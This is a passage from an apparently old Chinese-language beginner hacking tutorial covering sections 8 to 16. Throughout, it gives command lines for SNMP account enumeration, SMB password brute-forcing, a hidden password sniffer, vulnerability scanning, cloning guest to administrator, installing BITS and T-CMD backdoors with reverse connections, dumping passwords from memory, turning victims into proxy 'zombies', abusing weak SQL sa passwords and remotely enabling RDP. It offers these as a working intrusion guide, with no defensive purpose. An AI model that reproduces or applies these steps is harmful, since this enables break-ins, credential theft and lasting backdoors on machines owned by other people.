walk]agent id     \\语法格式

　　Snmputil walk 192.168.1.1 ylinuxs.1.3.6.1.4.1.77.1.2.25.1.5   \\查询帐户

　　Snmputil walk 对方ip public.1.3.6.1.2.1.25.4.2.1.2   \\查询系统进程

　　Snmputil walk 对方ip public.1.3.6.1.4.1.77.1.2.25.1.1   \\查询用户列表

　　Snmputil walk 对方ip public .1.3.6.1.2.1.1    \\列出对方系统信息

　　该工具的作用：查询一部分系统而已

　　我个人这个没有很大的作用，查看到了系统信息，要攻破还是需要运气

　　8、暴力破解系统密码

　　Smbcrack

　　Smbcrack ip username 字典路径 端口

　　说明：首先你需要用字典自己做一个字典，用户名建议是administrator 因为这个是系统默认的管理员估计大多数人的主机这个帐号还是存在的，端

　　口可以是139、137、445等系统开启的netBOIS协议端口就可以！

　　9、小巧的嗅叹器_xsniff(若有需要还可以用sniffer,对于sniffer全是英文的，没有一个月，一般人拿来用处不大，若你精通了，那可就厉害了,若想

　　下载或是想学习去http://hi.baidu.com/ylinuxs/blog/item/2202cb408ef79c1c9313c634.html，上面有说明文件.)

　　Xsniff是一个小巧的嗅叹器，可以嗅叹UDP/TCP协议的信息

　　使用语法：

　　Xsniff –pass –hide –log c:\pass.log –pass

　　c:\pass.log 是保存记录文件，建议选择一个深的目录，可以自定义

　　性能参数：

　　-hide 隐藏在后台运行          -log：生成嗅叹的日志文档

　　Pass.log:嗅叹的日志文档文档名，可以自定义

　　-TCP：捕获TCP数据包

　　-UDP：捕获UDP数据包

　　-ICMP：捕获ICMP数据包

　　-HOST：主机名或ip地址

　　-PORT：指定端口嗅叹

　　-ASC输出出时保存为ASCII格式

　　10、SFIND 命令行扫描器

　　例子：

　　Sfind –p 3389 192.168.1.1 192.168.1.255

　　扫描192.168.1.1段的1-255主机的3389端口

　　Sfind –cgi 192.168.1.1    //扫描192.168.1.1的cgi漏洞

　　Sfind –ftp 192.168.1.1    //扫描192.168.1.1的ftp漏洞

　　Sfind –idq 192.168.1.1    //扫描192.168.1.1的idg漏洞

　　11、克隆帐号CA：

　　CA.EXE \\ip administrator “” guest 123

　　将GUEST帐号克隆成管理员

　　Administrator 的密码为空用”” guest的密码是123

　　12、后门使用：

　　这里我介绍小榕的bits

　　说明：BITS必须放在system32目录下才可以安装

　　安装命令：rundll32.exe BITS.dll install rasato ylinuxs \\指定后门特征为ylinuxs

　　连接激活：

　　正向连接（用nc连接即可）：ylinuxs:@ip[xell]:99

　　反向连接:ylinuxs:@ip[rxell]:yourip:port

　　卸载：rundll32.exe BITS.dll uninstall

　　同时也介绍T-CMD

　　安装命令：

　　t-cmd –install

　　然后：telnet ip 20540

　　就可以了，T-CMD是菜鸟的好选择

　　13、系统密码查看_showpass

　　直接进入showpass的目录直接运行showpass只要当前用户在线，那么showpass就可以把他的密码从内存里找出来。

　　14、代理肉鸡的制作_SK

　　安装命令：

　　sk.exe –install   \\安装SK

　　sk.exe -config port 4999 \\设置端口为4999

　　sk.exe -config starttype 2 \\设置启动项为自启动

　　net start skserver   \\启动SK代理服务

　　15、SQL弱口令利用

　　我本来在这里不想说这个，但是希望大家能够综合利用所以我就直接说了。(SQL的弱口令大家可以用WINDOWS 2000自动攻击探测器扫描.)

　　Sqlexeca.exe ip sa 123

　　因为是弱口令，所以用123表示，同时也告诉大家SQL服务器的最高权限帐户是SA，这个是不能更改的！

　　16、终端服务的开启与使用

　　这个恐怕就是菜鸟们最喜欢的话题了一个图形话的交互界面

　　工具：3389.exe 3389.vbe 3389.bat

　　方法一：3389.exe：只需要把此文件复制到你所要开启的服务器运行此程序就可以了。

　　方法二：3389.vbe：这个是一个脚本文件，使用方法如下：

　　Cscript 3389.vbe ip username pass port /r    //密码必须是管理员密码 port是终端的端口，这个是可以自己定义的，参数.r是说

　　明开启成功自动重启动服务器！你也可以使用/fr，FR的意思就是强制重新启动服务器！

　　方法三：3389.bat：这个是一个BAT文件利用批处理来开3389网络上很多相关资料大家可以参考参考，3389.bat的内容如下：

　　echo [components] > d:\ylinuxs

　　echo tsenable=on >> d:\ylinuxs

　　sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\ylinuxs /q

　　大家可以把上述代码保存一个bat然后放到要开3389的服务器上，在CMD下运行，服务器的3389就开启了。

　　终端的连接：

　　这里推荐使用2003或者XP的终端登陆器,然后系统会提示你输入帐号与密码，输入以后直接登陆就可以了!